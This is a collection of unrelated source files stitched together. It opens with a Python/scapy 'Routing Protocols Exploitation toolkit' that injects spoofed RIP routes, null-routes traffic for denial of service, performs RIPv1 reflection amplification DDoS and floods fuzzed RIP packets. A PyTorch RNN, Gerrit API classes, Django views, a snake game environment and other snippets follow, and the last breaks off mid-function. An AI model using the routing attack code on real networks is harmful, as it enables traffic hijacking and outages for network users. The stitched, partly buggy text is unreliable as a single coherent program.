return set([x for x in out if len(x) <= maxLen])
return out
@staticmethod
def get32bitProblematicPowersOf2():
return Fuzzer.get32bitFuzzes()
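# For reference, deBrujinPattern generates the classic cyclic offset pattern, e.g.
# Fuzzer.deBrujinPattern(12) == "Aa0Aa1Aa2Aa3", and getFuzzyStrings() feeds such strings at boundary
# lengths (2**n - 2, 2**n - 1, 2**n, 2**n + 1) into the payloads and auth fields of the fuzzed RIP packets below.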
class RoutingAttack:
def __init__(self):
pass
def injectOptions(self, params, config):
pass
def launch(self):
pass
class Sniffer(RoutingAttack):
def __init__(self):
pass
def injectOptions(self, params, config):
self.config = config
self.config.update(params)
def processPacket(pkt):
# TODO
raise Exception('Not yet implemented.')
def launch(self):
# TODO
raise Exception('Not yet implemented.')
def packetCallback(d):
self.processPacket(d)
try:
pkts = sniff(
count = 1000,
filter = 'udp port 520',
timeout = 10.0,
prn = packetCallback,
iface = self.config['interface']
)
except Exception as e:
if 'Network is down' in str(e):
pass
else:
Logger.err('Exception occured during sniffing: {}'.format(str(e)))
except KeyboardInterrupt:
pass
class RIPv1v2Attacks(RoutingAttack):
ripAuthTypes = {
'simple' : 2, 'md5' : 3, 'md5authdata': 1
}
def __init__(self):
self.config = {
'interface' : '',
'delay': 1,
'network' : '',
'metric' : 10,
'netmask' : '255.255.255.0',
'nexthop' : '0.0.0.0',
'spoof' : '',
'version' : 0,
}
@staticmethod
def getRipAuth(config):
ripauth = RIPAuth()
ripauth.authtype = RIPv1v2Attacks.ripAuthTypes[config['auth-type']]
if ripauth.authtype == 2:
ripauth.password = config['auth-data']
elif ripauth.authtype == 1:
ripauth.authdata = config['auth-data']
elif ripauth.authtype == 3:
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = len(config['auth-data'])
ripauth.seqnum = 0
return ripauth
def injectOptions(self, params, config):
self.config = config
self.config.update(params)
Logger.info("Fake Route Announcement to be injected:")
Logger.info("\tNetwork: {}".format(config['network']))
Logger.info("\tNetmask: {}".format(config['netmask']))
Logger.info("\tNexthop: {}".format(config['nexthop']))
Logger.info("\tMetric: {}".format(config['metric']))
if not config['network'] or not config['netmask'] \
or not config['nexthop'] or not config['metric']:
Logger.err("Module needs following options to operate: network, netmask, nexthop, metric")
return False
if params['version'] != 1 and params['version'] != 2:
Logger.err("RIP protocol version must be either 1 or 2 as passed in attacks params!")
return False
return True
def launch(self):
packet = self.getPacket()
Logger.info("Sending RIPv{} Spoofed Route Announcements...".format(self.config['version']))
sendp(packet, loop = 1, inter = self.config['delay'], iface = config['interface'])
def getPacket(self):
networkToAnnounce = self.config['network']
metricToAnnounce = self.config['metric']
netmaskToAnnounce = self.config['netmask']
nexthopToAnnounce = self.config['nexthop']
spoofedIp = self.config['spoof']
etherframe = Ether() # Start definition of Ethernet Frame
ip = IP() # IPv4 packet
udp = UDP()
udp.sport = 520 # According to RFC1058, 520/UDP port must be used for solicited communication
udp.dport = 520
rip = RIP()
ripentry = RIPEntry() # Announced route
ripentry.AF = "IP" # Address Family: IP
if 'AF' in self.config.keys():
ripentry.AF = self.config['AF']
ripentry.addr = networkToAnnounce # Spoof route for this network...
ripentry.metric = metricToAnnounce
if self.config['version'] == 1:
ip.dst = '255.255.255.255' # RIPv1 broadcast destination
etherframe.dst = 'ff:ff:ff:ff:ff:ff'
rip.version = 1 # RIPv1
rip.cmd = 2 # Command: Response
elif self.config['version'] == 2:
ip.dst = '224.0.0.9' # RIPv2 multicast destination
rip.version = 2 # RIPv2
rip.cmd = 2 # Command: Response
ripentry.RouteTag = 0
ripentry.mask = netmaskToAnnounce
ripentry.nextHop = nexthopToAnnounce # ... to be going through this next hop device.
if 'rip_cmd' in self.config.keys():
rip.cmd = self.config['rip_cmd']
if not self.config['auth-type']:
rip_packet = etherframe / ip / udp / rip / ripentry
else:
ripauth = RIPv1v2Attacks.getRipAuth(self.config)
Logger.info('Using RIPv2 authentication: type={}, pass="{}"'.format(
self.config['auth-type'], self.config['auth-data']
))
rip_packet = etherframe / ip / udp / rip / ripauth / ripentry
rip_packet[IP].src = spoofedIp
return rip_packet
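# The announcement above is plain scapy layering, roughly
#   Ether()/IP(src=spoof, dst="224.0.0.9")/UDP(sport=520, dport=520)/RIP(version=2, cmd=2)/RIPEntry(...)
# for RIPv2, with an optional RIPAuth() layer slotted between RIP and RIPEntry when --auth-type is set.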
class RIPFuzzer(RoutingAttack):
ripCommands = (
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11
)
def __init__(self):
self.config = {
'interface' : '',
'network' : '192.168.1.0',
'metric' : 10,
'netmask' : '255.255.255.0',
'nexthop' : '0.0.0.0',
'spoof' : '',
}
def injectOptions(self, params, config):
self.config = config
self.params = params
return True
def launch(self):
packets = set()
Logger.info("Generating fuzzed packets for RIPv1...")
packets.update(self.generateRipv1Packets())
Logger.info("Generating fuzzed packets for RIPv2...")
packets.update(self.generateRipv2Packets())
Logger.info("Collected in total {} packets to send. Sending them out...".format(len(packets)))
packetsLists = [[] for x in range(self.config['processors'])]
packetsList = list(packets)
for i in range(len(packetsList)):
packetsLists[i % config['processors']].append(packetsList[i])
jobs = []
for i in range(config['processors']):
task = multiprocessing.Process(target = flooder, args = (i, packetsLists[i]))
jobs.append(task)
task.daemon = True
task.start()
print('[+] Started flooding. Press CTRL-C to stop that.')
try:
while jobs:
jobs = [job for job in jobs if job.is_alive()]
        except KeyboardInterrupt:
            global stopThreads
            stopThreads = True  # set the module-level flag (note: worker processes keep their own copy)
            print('\n[>] Stopping...')
time.sleep(3)
Logger.ok("Fuzzing finished. Sent around {} packets.".format(len(packets)))
def generateRipv1Packets(self):
packets = set()
base = Ether(dst = 'ff:ff:ff:ff:ff:ff') / IP(dst = '255.255.255.255') / UDP(sport = 520, dport = 520)
# Step 1: Fuzz on Command values.
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 1, cmd = val)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 1b: Fuzz on Command values with packet filled up with data
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 1, cmd = val)
for data in Fuzzer.getFuzzyStrings():
if not data: data = ''
packets.add(base / rip / data)
packets.add(base / rip / RIPEntry() / data)
# Step 2: Fuzz on Response RIPEntry AF values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(AF = val) )
# Step 3: Fuzz on Response RIPEntry RouteTag values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(RouteTag = val) )
# Step 4: Fuzz on Response RIPEntry metric values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(metric = val) )
# Step 5: Add multiple RIPEntry structures
for num in Fuzzer.get32bitProblematicPowersOf2():
rip = RIP(version = 1, cmd = 2)
entries = []
try:
ipv4 = socket.inet_ntoa(struct.pack('!L', num))
except:
ipv4 = '127.0.0.2'
if (num * 20) > 2 ** 16:
break
for i in range(num):
entries.append(RIPEntry(addr = ipv4))
packets.add(base / rip / ''.join([str(x) for x in entries]))
return packets
def generateRipv2Packets(self):
packets = set()
base = Ether() / IP(src = self.config['spoof'], dst = '224.0.0.9') / UDP(sport = 520, dport = 520)
# Step 1: Fuzz on Command values.
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 2, cmd = val)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 1b: Fuzz on Command values with packet filled up with data
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 2, cmd = val)
for data in Fuzzer.getFuzzyStrings():
if not data: data = ''
packets.add(base / rip / data)
packets.add(base / rip / RIPEntry() / data)
# Step 2: Fuzz on Version values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = val, cmd = 1)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 3: Fuzz on Authentication data values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = val, cmd = 1)
for auth in RIPFuzzer.fuzzRipv2Auth():
packets.add(base / rip / auth )
packets.add(base / rip / auth / RIPEntry() )
# Step 4: Fuzz on Response RIPEntry AF values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(AF = val) )
# Step 5: Fuzz on Response RIPEntry RouteTag values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(RouteTag = val) )
# Step 6: Fuzz on Response RIPEntry metric values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(metric = val) )
# Step 7: Add multiple RIPEntry structures
for num in Fuzzer.get32bitProblematicPowersOf2():
rip = RIP(version = 2, cmd = 2)
entries = []
try:
ipv4 = socket.inet_ntoa(struct.pack('!L', num))
except:
ipv4 = '127.0.0.2'
if (num * 20) > 2 ** 16:
break
for i in range(num):
entries.append(RIPEntry(addr = ipv4))
packets.add(base / rip / ''.join([str(x) for x in entries]))
return packets
@staticmethod
def fuzzRipv2Auth():
auths = set()
# Step 1: Fuzz on RIPAuth authtype.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = val
ripauth.password = '0123456789abcdef'
auths.add(ripauth)
# Step 2: Fuzz on RIPAuth md5authdata structure's digestoffset.
for val in set(Fuzzer.get16bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = val
ripauth.keyid = 0
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = 0
auths.add(ripauth)
# Step 3: Fuzz on RIPAuth md5authdata structure's keyid.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = val
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = 0
auths.add(ripauth)
# Step 4: Fuzz on RIPAuth md5authdata structure's seqnum.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = val
auths.add(ripauth)
# Step 5: Fuzz on RIPAuth md5authdata structure's authdatalen.
for val in set(Fuzzer.getFuzzyStrings(maxLen = 16, allOfThem = False)):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = val
ripauth.seqnum = 0
auths.add(ripauth)
return auths
def getHwAddr(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
def getIfaceIP(iface):
out = shell("ip addr show " + iface + " | grep 'inet ' | awk '{print $2}' | head -1 | cut -d/ -f1")
Logger.dbg('Interface: {} has IP: {}'.format(iface, out))
return out
def shell(cmd):
out = commands.getstatusoutput(cmd)[1]
Logger.dbg('shell("{}") returned:\n"{}"'.format(cmd, out))
return out
def selectDefaultInterface():
global config
    lookup_commands = {
        'ip' :      "ip route show | grep default | awk '{print $5}' | head -1",
        'ifconfig': "route -n | grep 0.0.0.0 | grep 'UG' | awk '{print $8}' | head -1",
    }
    # local dict renamed so it does not shadow the `commands` module used by shell()
    for k, v in lookup_commands.items():
out = shell(v)
if len(out) > 0:
Logger.dbg('Default interface lookup command returned:\n{}'.format(out))
config['interface'] = out
return out
return ''
def parseOptions(argv):
global config
print('''
:: Routing Protocols Exploitation toolkit
Sends out various routing protocols management frames
Mariusz B. / mgeeky '19, <[email protected]>
v{}
'''.format(VERSION))
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
parser.add_argument('-D', '--debug', action='store_true', help='Display debug output.')
    parser.add_argument('-d', '--delay', type=float, default=1.0, help='Delay in seconds (float) between sending consecutive packets. Default: 1 second. Does not apply to fuzzers.')
parser.add_argument('-t', '--attack', metavar='ATTACK', default='', help='Select attack to launch. One can use: "-t list" to list available attacks.')
parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
parser.add_argument('-s', '--spoof', help = 'IP address to be used as a spoofed/fake gateway, e.g. Attacker machine address. By default will try to figure out that address automatically.', default='')
auth = parser.add_argument_group('Routing Protocol Authentication', 'Specifies authentication data for Routing protocol to use')
auth.add_argument('--auth-type', help = 'Authentication type. Can be one of following: "simple", "md5authdata", "md5". Applies only to authentication-capable protocols, like RIPv2', default='')
auth.add_argument('--auth-data', help = 'Password / authentication data to pass in every packet. This field depends on the "--auth-type" used.', default='')
route = parser.add_argument_group('Spoofed Route injection', 'Specifies fake route details to inject')
route.add_argument('-a', '--network', help = 'IP address of network to announce, can be paired with netmask in CIDR notation. One can use "default" for 0.0.0.0')
    route.add_argument('-b', '--netmask', help = 'Netmask to use (can be inferred from "--network"). Default: /24', default='255.255.255.0')
route.add_argument('-c', '--nexthop', help = 'Spoofed next hop address. Default: 0.0.0.0.', default = '0.0.0.0')
    route.add_argument('-m', '--metric', help = 'Metric to be used. The lower the metric, the higher the priority. Default: 10', type=int, default='10')
args = parser.parse_args()
    if not args.attack:
Logger.err('You must specify an attack to launch!')
return False
if args.attack == 'list':
print("Available attacks:")
for a in attacks:
print("\t{}. '{}' - {}".format(a['num'], a['name'], a['desc']))
sys.exit(0)
else:
att = args.attack
try:
att = int(att)
except: pass
for a in attacks:
if att == a['num'] or att == a['name']:
config['attack'] = a
break
if 'attack' not in config or not config['attack']:
Logger.err("Selected attack is not implemented or wrongly stated.")
parser.print_help()
return False
config['verbose'] = args.verbose
config['debug'] = args.debug
config['delay'] = args.delay
if args.interface != '': config['interface'] = args.interface
else: config['interface'] = selectDefaultInterface()
    if args.network: config['network'] = args.network
if args.spoof != '': config['spoof'] = args.spoof
else: config['spoof'] = getIfaceIP(config['interface'])
Logger.info("Using {} as local/spoof IP address".format(config['spoof']))
if args.netmask != '': config['netmask'] = args.netmask
if args.nexthop != '': config['nexthop'] = args.nexthop
if args.metric != '': config['metric'] = args.metric
if args.auth_type != '': config['auth-type'] = args.auth_type
if args.auth_data != '': config['auth-data'] = args.auth_data
if config['auth-type'] != '':
if config['auth-data'] == '':
Logger.err("You must specify authentication data along with the --auth-type.")
return False
config['auth-type'] = args.auth_type
config['auth-data'] = args.auth_data
return args
def main(argv):
global attacks
attacks = (
{
'num': 0,
'name': 'sniffer',
'desc': '(NOT YET IMPLEMENTED) Sniffer hunting for authentication strings.',
'object': Sniffer,
'params': {
}
},
{
'num': 1,
'name': 'ripv1-route',
'desc': 'RIP Spoofed Route announcement',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
}
},
{
'num': 2,
'name': 'ripv1-dos',
'desc': 'RIPv1 Denial of Service by Null-routing',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
'delay' : 1,
'network': '0.0.0.0',
'metric': 1
}
},
{
'num': 3,
'name': 'ripv1-ampl',
'desc': 'RIPv1 Reflection Amplification DDoS',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
'delay' : 0.5,
'network': '0.0.0.0',
'netmask': '0.0.0.0',
'nexthop': '0.0.0.1',
'metric': 1,
'AF': 0, # Unspecified
'rip_cmd': 1, # Request
}
},
{
'num': 4,
'name': 'ripv2-route',
'desc': 'RIPv2 Spoofed Route announcement',
'object': RIPv1v2Attacks,
'params': {
'version' : 2,
}
},
{
'num': 5,
'name': 'ripv2-dos',
'desc': 'RIPv2 Denial of Service by Null-routing',
'object': RIPv1v2Attacks,
'params': {
'version' : 2,
'delay' : 1,
'network': '0.0.0.0',
'netmask': '0.0.0.0',
'nexthop': '0.0.0.1',
'metric': 1
}
},
{
'num': 6,
'name': 'rip-fuzzer',
'desc': 'RIP/RIPv2 packets fuzzer',
'object': RIPFuzzer,
'params': {
}
},
)
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
if os.getuid() != 0:
Logger.err('This program must be run as root.')
return False
load_contrib('ospf')
load_contrib('eigrp')
load_contrib('bgp')
attack = config['attack']['object']()
print("[+] Launching attack: {}".format(config['attack']['desc']))
if attack.injectOptions(config['attack']['params'], config):
attack.launch()
else:
Logger.err("Module prerequisite options were not passed correctly.")
if __name__ == '__main__':
main(sys.argv)
|
the-stack_0_12350 | import torch
import torch.nn as nn
from torch.autograd import Variable
class RNN(nn.Module):
def __init__(self, input_size, hidden_size, output_size, n_layers=1):
super(RNN, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = output_size
self.n_layers = n_layers
self.encoder = nn.Embedding(input_size, hidden_size)
self.gru = nn.GRU(hidden_size, hidden_size, n_layers)
self.decoder = nn.Linear(hidden_size, output_size)
def forward(self, input, hidden):
input = self.encoder(input.view(1, -1))
output, hidden = self.gru(input.view(1, 1, -1), hidden)
output = self.decoder(output.view(1, -1))
return output, hidden
def init_hidden(self):
return Variable(torch.zeros(self.n_layers, 1, self.hidden_size))
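
# Minimal usage sketch (illustrative): one character step through the model.
# The sizes and the input index below are placeholder values.
if __name__ == '__main__':
    model = RNN(input_size=100, hidden_size=64, output_size=100)
    hidden = model.init_hidden()
    char_idx = Variable(torch.LongTensor([5]))  # hypothetical character index
    output, hidden = model(char_idx, hidden)
    print(output.shape)  # torch.Size([1, 100])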
|
the-stack_0_12353 | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A Mesos-customized entry point to the thermos_observer webserver."""
import time
from twitter.common import app
from twitter.common.exceptions import ExceptionalThread
from twitter.common.log.options import LogOptions
from twitter.common.quantity import Amount, Time
from apache.aurora.executor.common.path_detector import MesosPathDetector
from apache.thermos.observer.http.configure import configure_server
from apache.thermos.observer.task_observer import TaskObserver
app.add_option(
'--mesos-root',
dest='mesos_root',
type='string',
default=MesosPathDetector.DEFAULT_MESOS_ROOT,
help='The mesos root directory to search for Thermos executor sandboxes [default: %default]')
app.add_option(
'--port',
dest='port',
type='int',
default=1338,
help='The port on which the observer should listen.')
app.add_option(
'--polling_interval_secs',
dest='polling_interval_secs',
type='int',
default=int(TaskObserver.POLLING_INTERVAL.as_(Time.SECONDS)),
help='The number of seconds between observer refresh attempts.')
# Allow an interruptible sleep so that ^C works.
def sleep_forever():
while True:
time.sleep(1)
def initialize(options):
path_detector = MesosPathDetector(options.mesos_root)
polling_interval = Amount(options.polling_interval_secs, Time.SECONDS)
return TaskObserver(path_detector, interval=polling_interval)
def main(_, options):
observer = initialize(options)
observer.start()
root_server = configure_server(observer)
thread = ExceptionalThread(target=lambda: root_server.run('0.0.0.0', options.port, 'cherrypy'))
thread.daemon = True
thread.start()
sleep_forever()
LogOptions.set_stderr_log_level('google:INFO')
app.main()
|
the-stack_0_12355 | #!/usr/bin/python3
def safe_print_list(my_list=[], x=0):
i = 0
for j in range(0, x):
try:
print(my_list[j], end='')
i = i + 1
except:
break
print()
return i
|
the-stack_0_12357 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# @Author: Jialiang Shi
from gerrit.utils.models import BaseModel
class Message(BaseModel):
def __init__(self, **kwargs):
super(Message, self).__init__(**kwargs)
self.attributes = [
"id",
"_revision_number",
"message",
"date",
"author",
"real_author",
"tag",
"change",
"gerrit",
]
def delete(self, input_=None):
"""
Deletes a change message.
Note that only users with the Administrate Server global capability are permitted to delete a change message.
.. code-block:: python
input_ = {
"reason": "spam"
}
change = gerrit.changes.get('myProject~stable~I10394472cbd17dd12454f229e4f6de00b143a444')
message = change.messages.get("babf4c5dd53d7a11080696efa78830d0a07762e6")
result = message.delete(input_)
# or
result = message.delete()
:param input_: the DeleteChangeMessageInput entity,
https://gerrit-review.googlesource.com/Documentation/rest-api-changes.html#delete-change-message-input
:return:
"""
if input_ is None:
endpoint = "/changes/%s/messages/%s" % (self.change, self.id)
self.gerrit.requester.delete(self.gerrit.get_endpoint_url(endpoint))
else:
endpoint = "/changes/%s/messages/%s/delete" % (self.change, self.id)
base_url = self.gerrit.get_endpoint_url(endpoint)
response = self.gerrit.requester.post(
base_url, json=input_, headers=self.gerrit.default_headers
)
result = self.gerrit.decode_response(response)
change = self.gerrit.changes.get(self.change)
return change.messages.get(result.get("id"))
class Messages(object):
def __init__(self, change, gerrit):
self.change = change
self.gerrit = gerrit
def list(self):
"""
Lists all the messages of a change including detailed account information.
:return:
"""
endpoint = "/changes/%s/messages" % self.change
response = self.gerrit.requester.get(self.gerrit.get_endpoint_url(endpoint))
result = self.gerrit.decode_response(response)
return Message.parse_list(result, change=self.change, gerrit=self.gerrit)
def get(self, id_):
"""
Retrieves a change message including detailed account information.
:param id_: change message id
:return:
"""
endpoint = "/changes/%s/messages/%s" % (self.change, id_)
response = self.gerrit.requester.get(self.gerrit.get_endpoint_url(endpoint))
result = self.gerrit.decode_response(response)
return Message.parse(result, change=self.change, gerrit=self.gerrit)
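# Usage sketch (illustrative; assumes a configured `gerrit` client from this package
# and a hypothetical change id):
#
#   change = gerrit.changes.get('myProject~master~I8473b95934b5732ac55d26311a706c9c2bde9940')
#   for message in change.messages.list():
#       print(message.id, message.message)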
|
the-stack_0_12358 | from __future__ import absolute_import, print_function
import typing
import gym
from core import Action
from graphic import CursesSnake
class SnakeEnv(gym.Env):
"""
0 -> go straight
1 -> turn left
2 -> turn right
"""
action_space = [0, 1, 2]
def __init__(self, shape: [typing.List[int], typing.Tuple[int, int]] = (4, 4)):
self.shape = shape
self.curses_snake: CursesSnake = ...
action_space = Action
up, down, left, right, none = (action_space.UP, action_space.DOWN, action_space.LEFT,
action_space.RIGHT, action_space.NONE)
self.direction_env_action_to_game_action: typing.Dict[int, typing.List[int]] = {
up: [none, left, right],
down: [none, right, left],
left: [none, down, up],
right: [none, up, down]
}
self.reset()
def reset(self) -> typing.List[typing.List[int]]:
self.curses_snake = CursesSnake(self.shape)
return self.curses_snake.snake.game_board.data
def render(self, mode='human') -> None:
self.curses_snake.render()
def step(self, action: int) -> (typing.List[typing.List[int]], float, bool, typing.Any):
return self.curses_snake.snake.step(
self.direction_env_action_to_game_action[
self.curses_snake.snake.snake.direction][action])
def close(self):
self.curses_snake.close()
def seed(self, seed=None):
pass
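
# Minimal usage sketch (illustrative): drive the environment with random actions.
# It assumes step() follows the (observation, reward, done, info) convention
# suggested by its return annotation.
if __name__ == '__main__':
    import random

    env = SnakeEnv((8, 8))
    env.reset()
    done = False
    while not done:
        env.render()
        _board, _reward, done, _info = env.step(random.choice(SnakeEnv.action_space))
    env.close()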
|
the-stack_0_12359 | # Create your views here.
from django import forms, http
from django.http import Http404, HttpResponse
from django.views.generic import ListView, View, CreateView, FormView, UpdateView
from django.views.generic.base import TemplateView
from django.http import HttpResponseRedirect
from core.views import AuthorizedOrganizationMixin, AuthorizedOrganizationEditMixin, ConfirmationObjectView
from django.utils import simplejson
from core.views import PathMixin
from django.core.urlresolvers import reverse
from braces.views import LoginRequiredMixin
from django.template.defaultfilters import slugify
from experiment.forms import ExperimentManualForm, ExperimentAddForm
from protocols.models import Protocol, Step, Action, Thermocycle, Machine, Component
from organization.models import Organization
from schedule.models import Calendar
from experiment.models import Experiment
from protocols.utils import VERB_CHOICES, VERB_FORM_DICT
from workflow.models import Workflow
class ExperimentSetupMixin(PathMixin):
pathEnd = {}
titleMarks = {'suffix':"",'prefix':""}
def get_context_data(self, **kwargs):
context = super(ExperimentSetupMixin, self).get_context_data(**kwargs)
experiment_slug = self.kwargs.get('experiment_slug', None)
prefix = self.titleMarks['prefix']
suffix = self.titleMarks['suffix']
title = ""
if experiment_slug:
context['experiment'] = self.request.user.experiment_set.get(slug=experiment_slug)
context['organization'] = context['experiment'].owner
context['workflow'] = context['experiment'].workflow
else:
owner_slug = self.kwargs.get('owner_slug', None)
if owner_slug:
context['organization'] = self.request.user.organization_set.get(slug=owner_slug)
if 'organization' in context:
context['paths'].append({'name':context['organization'].name, 'url':context['organization'].get_absolute_url()})
title = context['organization'].name
if 'experiment' in context:
context['paths'].append({'name':context['experiment'].name, 'url':context['experiment'].get_absolute_url()})
prefix = title
title = context['experiment'].name
if self.pathEnd:
context['paths'].append( self.pathEnd )
suffix = self.pathEnd['name']
else:
del(context['paths'][-1]['url'])
if title:
context['titleBlock'] = {'prefix':prefix, 'title':title, 'suffix':suffix}
return context
class ExperimentDetailView(ExperimentSetupMixin, LoginRequiredMixin, TemplateView):
model = Experiment
slug_url_kwarg = "experiment_slug"
template_name = "experiment/experiment_detail.html"
def get_context_data(self, **kwargs):
context = super(ExperimentDetailView, self).get_context_data(**kwargs)
return context
class ExperimentUpdateView(ExperimentSetupMixin, LoginRequiredMixin, FormView):
model = Experiment
form_class = ExperimentManualForm
slug_url_kwarg = "owner_slug"
template_name = "experiment/experiment_form.html"
pathEnd = {'name':'Edit'}
def form_valid(self, form):
slug = self.kwargs.get(self.slug_url_kwarg, None)
org = self.request.user.organization_set.get(slug=slug)
slug = self.kwargs.get('experiment_slug', None)
exp = self.request.user.experiment_set.get(slug=slug)
oldWorkflow = exp.workflow
oldName = exp.name
exp.workflow = self.request.user.workflow_set.get(pk=form.cleaned_data['workflows'][0])
exp.name = form.cleaned_data['name']
exp.slug = slugify(exp.name)
exp.save()
if oldWorkflow != exp.workflow:
workflowChanged = True
else:
workflowChanged = False
if oldName != exp.name:
nameChanged = True
else:
nameChanged = False
for cal in self.request.user.calendar_set.all():
if exp.pk in cal.data['meta']['experiments']:
cal.updateCalendar(exp, workflowChanged, nameChanged)
return HttpResponseRedirect(exp.get_absolute_url())
def get_form(self, form_class):
form = form_class(**self.get_form_kwargs())
try:
exp = self.request.user.experiment_set.get(slug=self.kwargs['experiment_slug'])
org = self.request.user.organization_set.get(slug=self.kwargs['owner_slug'])
workflows = org.workflow_set.all()
workflows = [w for w in workflows if w.user==self.request.user and w!=exp.workflow]
workflows.insert(0,exp.workflow)
form.initial['name'] = exp.name
form.fields['workflows'] = forms.ChoiceField(
label="Workflows",
choices=((x.pk,x) for x in workflows))
return form
except:
# try:
# org = self.request.user.organization_set.get(slug=self.kwargs['owner_slug'])
# workflows = org.workflow_set.all()
# workflows = [w for w in workflows if w.user==self.request.user]
# form.fields['workflows'] = forms.ChoiceField(
# label="Workflows",
# choices=((x.pk,x) for x in workflows))
# except:
# raise Http404
# return form
raise Http404
class ExperimentAddView(ExperimentSetupMixin, LoginRequiredMixin, FormView):
model = Experiment
form_class = ExperimentAddForm
slug_url_kwarg = "experiment_slug"
template_name = "experiment/experiment_add.html"
pathEnd = {'name':'Add to Calendar'}
def form_valid(self, form):
try:
calendarPKs = [x[0] for x in form.cleaned_data['calendars']]
calendars = self.request.user.calendar_set.filter(pk__in=calendarPKs)
exp = self.request.user.experiment_set.get(slug=self.kwargs['experiment_slug'])
for cal in calendars:
cal.addExperiment(exp)
return HttpResponseRedirect(calendars[0].get_absolute_url())
except:
raise Http404
def get_form(self, form_class):
form = form_class(**self.get_form_kwargs())
try:
calendars = self.request.user.calendar_set.all()
form.fields['calendars'] = forms.MultipleChoiceField(
label="Calendars",
widget=forms.CheckboxSelectMultiple,
choices=((x.pk,x) for x in calendars))
except:
raise Http404
return form
# def post(self, request, *args, **kwargs):
# '''This is done to handle the two forms'''
# form = self.form_class(request.POST)
# if form.is_valid():
# return self.form_valid(form)
# else:
# return self.form_invalid(form)
# def form_invalid(self, form):
# return self.render_to_response(self.get_context_data(form=form))
class ExperimentCreateView(ExperimentSetupMixin, LoginRequiredMixin, FormView):
model = Experiment
form_class = ExperimentManualForm
slug_url_kwarg = "owner_slug"
template_name = "experiment/experiment_form.html"
pathEnd = {'name':'New Experiment'}
def get_success_url(self):
return self.get_absolute_url()
def form_valid(self, form):
slug = self.kwargs.get(self.slug_url_kwarg, None)
org = self.request.user.organization_set.get(slug=slug)
e = Experiment()
e.user = self.request.user
e.workflow = self.request.user.workflow_set.get(pk=form.cleaned_data['workflows'][0])
e.data = {'meta':{}}
e.name = form.cleaned_data['name']
e.slug = slugify(form.cleaned_data['name'])
e.owner = org
e.save()
return HttpResponseRedirect(e.get_absolute_url())
def get_form(self, form_class):
form = form_class(**self.get_form_kwargs())
try:
org = self.request.user.organization_set.get(slug=self.kwargs['owner_slug'])
workflows = org.workflow_set.all()
workflows = [w for w in workflows if w.user==self.request.user]
form.fields['workflows'] = forms.ChoiceField(
label="Workflows",
choices=((x.pk,x) for x in workflows))
except:
raise Http404
return form
|
the-stack_0_12361 | # https://www.acmicpc.net/problem/17135
def dfs(cur, depth):
if depth == 3:
# print(case)
check()
return
if cur == M:
return
dfs(cur + 1, depth)
case.append(cur)
dfs(cur + 1, depth + 1)
case.pop()
def check():
cnt = 0
for _ in range(N):
cnt += count_dead()
down()
for row, line in enumerate(temp):
graph[row] = line[:]
res.append(cnt)
def down():
for idx in range(N - 1, 0, -1):
graph[idx] = graph[idx - 1]
graph[0] = [0 for _ in range(M)]
def count_dead():
dead = [0 for _ in range(M)]
kill = list()
for arrow in case:
candi = list()
for row in range(N):
for col in range(M):
if graph[row][col] == 0:
continue
dist = abs(col - arrow) + abs(row - N)
